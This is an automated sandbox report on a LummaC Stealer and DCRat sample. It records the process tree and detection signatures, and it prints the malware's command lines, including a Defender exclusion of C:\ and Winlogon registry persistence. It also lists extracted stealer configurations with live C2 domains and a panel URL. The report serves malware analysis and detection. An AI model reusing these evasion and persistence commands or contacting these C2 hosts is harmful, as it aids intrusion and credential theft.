Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bFZYRLnRIz.exe

Overview

General Information

Sample name:bFZYRLnRIz.exe
renamed because original name is a hash value
Original sample name:289f27e7a02f8e76ebf39d2c0c3f09e4.bin.exe
Analysis ID:1461211
MD5:289f27e7a02f8e76ebf39d2c0c3f09e4
SHA1:fb404a7a85d5fb617436f73832e4716556756d6a
SHA256:854d267aea33e8dc80021ac043b003ab7c6f99061e56e36572cba3548e6882c9
Tags:dcratexelumma
Infos:

Detection

LummaC, DCRat, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • bFZYRLnRIz.exe (PID: 6384 cmdline: "C:\Users\user\Desktop\bFZYRLnRIz.exe" MD5: 289F27E7A02F8E76EBF39D2C0C3F09E4)
    • cmd.exe (PID: 6648 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cacls.exe (PID: 6812 cmdline: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system" MD5: A353590E06C976809F14906746109758)
      • cmd.exe (PID: 6868 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7020 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 5936 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • choice.exe (PID: 6548 cmdline: choice /c y /n /t 10 /d y MD5: 1A9804F0C374283B094E9E55DC5EE128)
        • reg.exe (PID: 6604 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 6840 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WINDOWS\system32\explorer.exe, C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • 572stuOQ0pZG2Xj.exe (PID: 6792 cmdline: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe MD5: 43AF303E1F32CE8C477ABBFB07887EA2)
          • Bypass.exe (PID: 7004 cmdline: "C:\ProgramData\SoftwareDistribution\Bypass.exe" MD5: 93E99FB34AC2CD9D6E867E24DCAFB2AB)
        • Loader.exe (PID: 6712 cmdline: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe MD5: B6C3C00D7CF6D8D13F20DBC590A675AD)
          • RegAsm.exe (PID: 6960 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • wscript.exe (PID: 2476 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
{"C2 url": ["facilitycoursedw.shop", "doughtdrillyksow.shop", "disappointcredisotw.shop", "bargainnygroandjwk.shop", "injurypiggyoewirog.shop", "leafcalfconflcitw.shop", "computerexcudesp.shop", "publicitycharetew.shop", "backcreammykiel.shop"], "Build id": "LPnhqo--@Qudette"}
{"SCRT": "{\"J\":\"(\",\"H\":\"|\",\"9\":\"_\",\"T\":\"*\",\"s\":\"%\",\"S\":\"&\",\"O\":\">\",\"2\":\"@\",\"i\":\"!\",\"D\":\"$\",\"w\":\"#\",\"m\":\"^\",\"l\":\")\",\"y\":\"<\",\"I\":\";\",\"Y\":\".\",\"j\":\" \",\"1\":\"~\",\"0\":\"`\",\"n\":\",\",\"N\":\"-\"}", "PCRT": "{\"i\":\"%\",\"3\":\"#\",\"2\":\"-\",\"1\":\"<\",\"U\":\"@\",\"k\":\"`\",\"g\":\";\",\"B\":\"|\",\"Q\":\"_\",\"T\":\")\",\"Z\":\"^\",\"S\":\" \",\"c\":\"~\",\"0\":\"&\",\"s\":\">\",\"a\":\"*\",\"V\":\".\",\"M\":\"!\",\"j\":\",\",\"b\":\"(\",\"e\":\"$\"}", "TAG": "", "MUTEX": "DCR_MUTEX-uoO5gecs0KSSZDI3KaVh", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 2, "AUR": 0, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": true, "AD": false, "H1": "http://ck66916.tw1.ru/@==gbJBzYuFDT", "H2": "http://ck66916.tw1.ru/@==gbJBzYuFDT", "T": "0"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
    • 0x2:$s1: &@cls&@set
    • 0x5c:$s2: :~41,1%%
    • 0x69:$s2: :~47,1%%
    • 0x76:$s2: :~36,1%%
    • 0x83:$s2: :~9,1%%
    • 0x8f:$s2: :~63,1%
    • 0x9e:$s2: :~51,1%%
    • 0xb4:$s2: :~45,1%%
    • 0xc1:$s2: :~28,1%
    • 0xcf:$s2: :~20,1%%
    • 0xdc:$s2: :~50,1%%
    • 0xe9:$s2: :~1,1%%
    • 0xf5:$s2: :~53,1%%
    • 0x102:$s2: :~42,1%%
    • 0x10f:$s2: :~13,1%%
    • 0x11c:$s2: :~3,1%%
    • 0x128:$s2: :~57,1%%
    • 0x135:$s2: :~63,1%%
    • 0x142:$s2: :~12,1%%
    • 0x14f:$s2: :~24,1%%
    • 0x15c:$s2: :~52,1%%
    C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
    • 0x2:$s1: &@cls&@set
    • 0x58:$s2: :~44,1%%
    • 0x63:$s2: :~26,1%%
    • 0x77:$s2: :~33,1%%
    • 0x82:$s2: :~53,1%%
    • 0x8d:$s2: :~50,1%
    • 0x9f:$s2: :~17,1%%
    • 0xaa:$s2: :~47,1%%
    • 0xb5:$s2: :~60,1%%
    • 0xc0:$s2: :~7,1%%
    • 0xd3:$s2: :~33,1%%
    • 0xde:$s2: :~4,1%%
    • 0xe8:$s2: :~10,1%%
    • 0xf3:$s2: :~11,1%%
    • 0xfe:$s2: :~61,1%%
    • 0x109:$s2: :~14,1%%
    • 0x114:$s2: :~44,1%%
    • 0x11f:$s2: :~51,1%%
    • 0x12a:$s2: :~36,1%%
    • 0x135:$s2: :~8,1%%
    • 0x13f:$s2: :~30,1%%
    C:\ProgramData\SoftwareDistribution\Bypass.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      C:\ProgramData\SoftwareDistribution\Bypass.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        C:\ProgramData\SoftwareDistribution\Bypass.exeMALWARE_Win_DCRatDCRat payloadditekSHen
        • 0x1b6692:$x2: DCRat-Log#
        • 0x40a6e:$x3: DCRat.Code
        • 0x40292:$v1: Plugin couldn't process this action!
        • 0x402dc:$v2: Unknown command!
        • 0x1b66f0:$v4: Saving log...
        • 0x1b670c:$v5: ~Work.log
        • 0x1b59ef:$v8: %SystemDrive% - Slow
        • 0x1b5a19:$v9: %UsersFolder% - Fast
        • 0x1b5a43:$v10: %AppData% - Very Fast
        SourceRuleDescriptionAuthorStrings
        0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
          0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
            0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
              0000000F.00000002.4119735415.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
                0000000F.00000002.4119735415.0000000005AD8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
                  Click to see the 13 entries
                  SourceRuleDescriptionAuthorStrings
                  15.0.Bypass.exe.7f0000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    15.0.Bypass.exe.7f0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      15.0.Bypass.exe.7f0000.0.unpackMALWARE_Win_DCRatDCRat payloadditekSHen
                      • 0x1b6692:$x2: DCRat-Log#
                      • 0x40a6e:$x3: DCRat.Code
                      • 0x40292:$v1: Plugin couldn't process this action!
                      • 0x402dc:$v2: Unknown command!
                      • 0x1b66f0:$v4: Saving log...
                      • 0x1b670c:$v5: ~Work.log
                      • 0x1b59ef:$v8: %SystemDrive% - Slow
                      • 0x1b5a19:$v9: %UsersFolder% - Fast
                      • 0x1b5a43:$v10: %AppData% - Very Fast

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\', ProcessId: 7020, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , ProcessId: 2476, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , ProcessId: 2476, ProcessName: wscript.exe
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , ProcessId: 2476, ProcessName: wscript.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 6604, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\', ProcessId: 7020, ProcessName: powershell.exe
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , ProcessId: 2476, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\', ProcessId: 7020, ProcessName: powershell.exe
                      Timestamp:06/23/24-06:54:21.035775
                      SID:2850862
                      Source Port:80
                      Destination Port:49745
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/23/24-06:56:28.389945
                      SID:2850862
                      Source Port:80
                      Destination Port:49773
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/23/24-06:55:24.045906
                      SID:2850862
                      Source Port:80
                      Destination Port:49762
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/23/24-06:57:31.268133
                      SID:2850862
                      Source Port:80
                      Destination Port:49784
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: https://backcreammykiel.shop/apiAvira URL Cloud: Label: malware
                      Source: https://backcreammykiel.shop/apiPKAvira URL Cloud: Label: malware
                      Source: https://backcreammykiel.shop/BAvira URL Cloud: Label: malware
                      Source: leafcalfconflcitw.shopAvira URL Cloud: Label: malware
                      Source: https://backcreammykiel.shop:443/apiAvira URL Cloud: Label: malware
                      Source: https://backcreammykiel.shop/sAvira URL Cloud: Label: malware
                      Source: backcreammykiel.shopAvira URL Cloud: Label: malware
                      Source: https://backcreammykiel.shop/lAvira URL Cloud: Label: malware
                      Source: https://backcreammykiel.shop/Avira URL Cloud: Label: malware
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeAvira: detection malicious, Label: HEUR/AGEN.1310064
                      Source: 15.0.Bypass.exe.7f0000.0.unpackMalware Configuration Extractor: DCRat {"SCRT": "{\"J\":\"(\",\"H\":\"|\",\"9\":\"_\",\"T\":\"*\",\"s\":\"%\",\"S\":\"&\",\"O\":\">\",\"2\":\"@\",\"i\":\"!\",\"D\":\"$\",\"w\":\"#\",\"m\":\"^\",\"l\":\")\",\"y\":\"<\",\"I\":\";\",\"Y\":\".\",\"j\":\" \",\"1\":\"~\",\"0\":\"`\",\"n\":\",\",\"N\":\"-\"}", "PCRT": "{\"i\":\"%\",\"3\":\"#\",\"2\":\"-\",\"1\":\"<\",\"U\":\"@\",\"k\":\"`\",\"g\":\";\",\"B\":\"|\",\"Q\":\"_\",\"T\":\")\",\"Z\":\"^\",\"S\":\" \",\"c\":\"~\",\"0\":\"&\",\"s\":\">\",\"a\":\"*\",\"V\":\".\",\"M\":\"!\",\"j\":\",\",\"b\":\"(\",\"e\":\"$\"}", "TAG": "", "MUTEX": "DCR_MUTEX-uoO5gecs0KSSZDI3KaVh", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 2, "AUR": 0, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": true, "AD": false, "H1": "http://ck66916.tw1.ru/@==gbJBzYuFDT", "H2": "http://ck66916.tw1.ru/@==gbJBzYuFDT", "T": "0"}
                      Source: 13.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["facilitycoursedw.shop", "doughtdrillyksow.shop", "disappointcredisotw.shop", "bargainnygroandjwk.shop", "injurypiggyoewirog.shop", "leafcalfconflcitw.shop", "computerexcudesp.shop", "publicitycharetew.shop", "backcreammykiel.shop"], "Build id": "LPnhqo--@Qudette"}
                      Source: backcreammykiel.shopVirustotal: Detection: 8%Perma Link
                      Source: https://backcreammykiel.shop/apiVirustotal: Detection: 16%Perma Link
                      Source: facilitycoursedw.shopVirustotal: Detection: 11%Perma Link
                      Source: doughtdrillyksow.shopVirustotal: Detection: 12%Perma Link
                      Source: disappointcredisotw.shopVirustotal: Detection: 9%Perma Link
                      Source: computerexcudesp.shopVirustotal: Detection: 13%Perma Link
                      Source: https://backcreammykiel.shop:443/apiVirustotal: Detection: 16%Perma Link
                      Source: publicitycharetew.shopVirustotal: Detection: 14%Perma Link
                      Source: leafcalfconflcitw.shopVirustotal: Detection: 9%Perma Link
                      Source: backcreammykiel.shopVirustotal: Detection: 8%Perma Link
                      Source: injurypiggyoewirog.shopVirustotal: Detection: 9%Perma Link
                      Source: bargainnygroandjwk.shopVirustotal: Detection: 9%Perma Link
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeReversingLabs: Detection: 78%
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeReversingLabs: Detection: 70%
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeReversingLabs: Detection: 39%
                      Source: bFZYRLnRIz.exeVirustotal: Detection: 56%Perma Link
                      Source: bFZYRLnRIz.exeReversingLabs: Detection: 57%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeJoe Sandbox ML: detected
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeJoe Sandbox ML: detected
                      Source: bFZYRLnRIz.exeJoe Sandbox ML: detected
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: facilitycoursedw.shop
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: doughtdrillyksow.shop
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: disappointcredisotw.shop
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: bargainnygroandjwk.shop
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: injurypiggyoewirog.shop
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: leafcalfconflcitw.shop
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: computerexcudesp.shop
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: publicitycharetew.shop
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: backcreammykiel.shop
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: TeslaBrowser/5.5
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: - Screen Resoluton:
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: - Physical Installed Memory:
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: Workgroup: -
                      Source: 13.2.RegAsm.exe.400000.0.unpackString decryptor: LPnhqo--@Qudette
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00416933 CryptUnprotectData,13_2_00416933
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49749 version: TLS 1.2
                      Source: bFZYRLnRIz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: ~C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
